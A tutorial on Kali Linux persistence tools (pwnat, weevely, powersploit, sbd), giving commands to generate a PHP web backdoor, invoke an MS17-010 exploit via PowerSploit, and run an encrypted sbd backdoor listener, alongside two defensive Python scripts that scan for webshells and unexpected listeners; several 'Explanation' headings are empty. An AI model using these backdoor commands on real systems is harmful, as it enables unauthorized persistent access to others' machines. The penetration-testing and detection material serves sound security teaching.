
Maintaining Access Tools in Kali Linux

Maintaining Access is the 4th phase of the ethical hacking process. In this phase, the hacker installs software or makes changes on the target machine so that it can be accessed again later. This keeps the hacker connected to the target machine and removes the need to start the whole process from scratch for the same target. This phase is also called persistence on the target system.

The various methodologies used in the ‘maintaining access’ phase are as follows:

Kali Linux Tools for Maintaining Access

Kali Linux is a Debian-based Linux distribution designed for the sole purpose of penetration testing. It comes with a large number of pre-installed hacking tools covering all phases of ethical hacking. Under the post-exploitation category, you can find several tools meant for maintaining access. These tools can be broadly grouped into the following classes:



In this article, we will discuss some of the important and popular maintaining access tools in Kali Linux.

Note

  • Angle brackets ‘<>’ are used as placeholders in the commands mentioned. Please replace the placeholders with suitable content.
  • If you get a ‘permission denied’ error while executing any of the commands, prefix the command with ‘sudo’ to execute the command as super user.
  • The knowledge acquired through this article can be used for educational purposes only.

Tool 1: pwnat

pwnat sets up a proxy server behind a NAT (Network Address Translation) gateway that accepts connections from any number of clients that are themselves behind NATs, without any third party in between.

sudo apt install pwnat

Once the tool is installed in your Kali Linux machine, you can use the help option to get a list of available operations in this tool.

pwnat -h

We use pwnat in two ways, as a server and as a client, so that we can understand the core usage of this tool. Let’s start by setting up a pwnat server using the command below.

sudo pwnat -s 8080

For simplicity, I’m running both the server and the client on the same machine. Now, open another terminal and start a pwnat client to connect to the server that is already running. Let’s connect to geeksforgeeks.org from our pwnat client, using the pwnat server as a proxy. The command to do so is given below.

sudo pwnat -c 8080 127.0.0.1 geeksforgeeks.org 443

Once the connection is established, the server continuously displays status messages in its terminal.

sudo pwnat -s 8080

Explanation

Tool 2: weevely

weevely is a built-in Kali Linux tool that generates payloads to be used as backdoors on target web servers. weevely also provides options to connect to the backdoor from the terminal and execute commands remotely.

Enter the name of this tool in your terminal to check if it is installed on your machine.

weevely

If you see this list of available options in the terminal, weevely is already installed. Otherwise, enter the following command to install weevely.

sudo apt install weevely

Let’s now create a sample PHP web backdoor to learn the usage of this tool. In the above screenshot of weevely options, you can see the syntax for creating a new agent, which is simply a new payload. We are going to use the same syntax here.

weevely generate GFG123 /home/matrix_angel/Desktop/backdoor.php

Explanation


Now you can list the contents of the directory using the ‘ls’ command to find the payload present in it.

ls

Since this procedure is part of post-exploitation, we assume that you have already found a way to upload this payload to the target web server. Once the upload is complete, you will be able to open a session with the web server and access its data.
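From the defender’s side, an uploaded PHP agent like the one generated above is what a web-root scan has to catch. The following Python script is an added example, not part of this article or of the weevely project: it scores each PHP file under a document root against a set of heuristic indicators (eval, base64_decode, command-execution functions, request superglobals, variable function calls, long base64-looking literals, very long lines) and reports the files whose score reaches a threshold. The indicator list, the weights, the threshold and the two sample files are constructed for the demonstration; the suspicious sample is not a working backdoor, its base64 blob decodes to plain text.

```python
from __future__ import annotations

import base64
import re
import tempfile
from pathlib import Path

# Heuristic indicators often seen in obfuscated PHP agents. Patterns and weights are
# constructed for this example; tune them against your own code base to limit false positives.
INDICATORS = {
    "eval()": (re.compile(r"\beval\s*\("), 3),
    "base64_decode()": (re.compile(r"\bbase64_decode\s*\("), 2),
    "decompress/rot13": (re.compile(r"\b(?:gzinflate|gzuncompress|str_rot13)\s*\("), 2),
    "command execution": (re.compile(r"\b(?:system|shell_exec|passthru|exec|proc_open|popen)\s*\("), 3),
    "request superglobal": (re.compile(r"\$_(?:POST|GET|COOKIE|REQUEST)\s*\["), 1),
    "variable function call": (re.compile(r"\$\w+\s*\(\s*\$\w+"), 2),
    "long base64 literal": (re.compile(r"['\"][A-Za-z0-9+/]{32,}={0,2}['\"]"), 2),
}
LONG_LINE = 400  # a single source line longer than this is a common obfuscation tell


def score_php(source: str) -> tuple[int, list[str]]:
    """Return (score, indicator names) for one PHP source text.
    Each indicator counts once, however many times it occurs."""
    score, hits = 0, []
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(source):
            score += weight
            hits.append(name)
    if any(len(line) > LONG_LINE for line in source.splitlines()):
        score += 2
        hits.append("very long line")
    return score, hits


def scan_webroot(root: Path, threshold: int = 5) -> list[tuple[str, int, list[str]]]:
    """Walk a document root and return (relative path, score, hits) for files at or above the threshold."""
    findings = []
    for path in sorted(root.rglob("*.php")):
        score, hits = score_php(path.read_text(errors="replace"))
        if score >= threshold:
            findings.append((path.relative_to(root).as_posix(), score, hits))
    return findings


# Constructed sample files (not real weevely output): an ordinary page, and a file that
# stacks the indicators an obfuscated agent tends to carry. BLOB decodes to plain text,
# so the suspicious sample does nothing useful if it were ever executed.
BENIGN_PHP = """<?php
$name = isset($_GET['name']) ? htmlspecialchars($_GET['name']) : 'guest';
echo "<h1>Hello, $name</h1>";
"""

BLOB = base64.b64encode(b"Constructed sample blob only, not code").decode()
SUSPICIOUS_PHP = f"""<?php
$k = '{BLOB}';
$f = 'gzinflate';
$p = $_REQUEST['p'];
$d = $f($p);
eval(base64_decode($k));
"""


def demo() -> list[tuple[str, int, list[str]]]:
    """Write both samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text(BENIGN_PHP)
        (root / "uploads").mkdir()
        (root / "uploads" / "image.php").write_text(SUSPICIOUS_PHP)
        return scan_webroot(root)


if __name__ == "__main__":
    for rel, score, hits in demo():
        print(f"{rel}: score {score} ({', '.join(hits)})")
```

Scoring by stacked indicators rather than a single keyword matters because individual hits such as base64_decode or $_POST are common in legitimate code; a real deployment would run this against a known-good copy of the site first to calibrate the threshold, and pair it with file-integrity monitoring of the upload directories.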

Tool 3: powersploit

powersploit is a collection of Microsoft PowerShell modules used by an authorized penetration tester for a wide range of assessments that can be carried out after exploiting a machine. Basically, it is a collection of executable scripts. It can be used for the following assessments:

This tool is on our list of maintaining access tools because of its capability to achieve persistence on the target machine.

Simply enter ‘powersploit’ in the terminal and hit ‘enter’ to change to the directory where powersploit is located.

powersploit

Each of these listed directories consists of various scripts to be utilized by a penetration tester. Let’s take a look at a command that uses powersploit scripts to find and exploit a vulnerability.

Get-NetWMIObject -Class win32_service -Filter "name='msftpsvc'" -ComputerName <TargetHostName> | Invoke-MS17-010

Explanation

Tool 4: sbd

sbd stands for Shadowinteger’s Backdoor. It is a Netcat clone designed for portability and strong encryption, implementing AES-CBC-128 + HMAC-SHA1. If you are not familiar with Netcat, it is a simple tool that reads and writes data across a network. Basically, sbd acts as an OS backdoor: it lets you connect to a victim’s machine at any time on a specific port and send commands remotely.

This tool is built into Kali Linux. You can use the command below to check if it is available on your machine.

sbd -h

This command returns a list of the options available in this tool. After successfully exploiting the target machine, you can set up an sbd server on it, which acts as a backdoor and keeps listening for incoming connection requests. The syntax of the command to set up an sbd server is given below:

sbd -l -p 7986 -c off -P "GFG_Ethical_Hacker" -H

Explanation

Now, let’s connect to the listening sbd server via telnet. The command to use is shown below.

telnet localhost 7986

Explanation

We have successfully connected to the target machine via telnet. We could also execute programs like bash by using the ‘-e’ option while setting up our server.
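On the compromised host, a backdoor listener like the one above shows up as a listening socket owned by a process that is not part of the machine’s baseline, so a periodic listener check is a cheap way to catch this kind of persistence. The following Python script is an added example, not part of this article or of sbd: it parses output in the shape of `ss -tlnp`, compares every listener against a baseline of expected port/process pairs, and reports anything that is not baselined, is owned by an unexpected process, or has no visible owner. The ss lines, the baseline, and all process names, PIDs and ports in it are constructed for the demonstration.

```python
import re

# Constructed lines in the shape of `ss -tlnp` output (not captured from a real host).
SS_OUTPUT = """State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       511     0.0.0.0:80           0.0.0.0:*          users:(("nginx",pid=1190,fd=6),("nginx",pid=1189,fd=6))
LISTEN  0       5       127.0.0.1:631        0.0.0.0:*          users:(("cupsd",pid=640,fd=7))
LISTEN  0       128     0.0.0.0:8080         0.0.0.0:*          users:(("python3",pid=23400,fd=3))
LISTEN  0       10      0.0.0.0:7986         0.0.0.0:*          users:(("sbd",pid=23011,fd=3))
LISTEN  0       128     [::]:22              [::]:*             users:(("sshd",pid=812,fd=4))
"""

# Constructed baseline for this host: port -> process names allowed to own a listener on it.
BASELINE = {22: {"sshd"}, 80: {"nginx"}, 631: {"cupsd"}, 8080: {"java"}}

# One LISTEN row: state, recv-q, send-q, local addr:port, peer addr:port, process column.
LINE_RE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+(.*)$")
# One ("name",pid=N,...) entry inside the users:(...) column.
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')


def parse_listeners(text):
    """Yield (local_addr, port, [(process, pid), ...]) for each LISTEN line in ss output."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header or non-LISTEN row
        addr, port, rest = m.group(1), int(m.group(2)), m.group(3)
        procs = [(name, int(pid)) for name, pid in PROC_RE.findall(rest)]
        yield addr, port, procs


def find_unexpected(text, baseline):
    """Return listeners that are not baselined, are owned by an unexpected process,
    or whose owner is not visible (ss hides other users' processes unless run as root)."""
    findings = []
    for addr, port, procs in parse_listeners(text):
        names = {name for name, _ in procs}
        if port not in baseline:
            reason = "port not in baseline"
        elif not procs:
            reason = "owning process not visible (run as root)"
        elif not names <= baseline[port]:
            reason = "unexpected process on baselined port"
        else:
            continue
        findings.append({"addr": addr, "port": port, "procs": procs, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in find_unexpected(SS_OUTPUT, BASELINE):
        owners = ", ".join(f"{n}(pid {p})" for n, p in f["procs"]) or "unknown"
        print(f"{f['addr']}:{f['port']}  {owners}  <- {f['reason']}")
```

In practice the baseline is generated from a known-good build of the host and the check runs from a scheduled job or an agent, with findings shipped to the SIEM; an encrypted listener such as sbd reveals nothing useful on the wire, so the socket and its owning process are the reliable signal, along with the firewall or NAT rule that had to be opened for it to be reachable.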

Conclusion

The ‘maintaining access’ phase is a crucial stage in the ethical hacking process, as it determines whether the target can be accessed again in the future. If this phase fails, the whole process has to be started from the beginning. The built-in tools of Kali Linux for maintaining access provide a handy way to complete this phase with ease. This is one of the many features of Kali Linux that make it a sophisticated OS for ethical hacking and penetration testing.

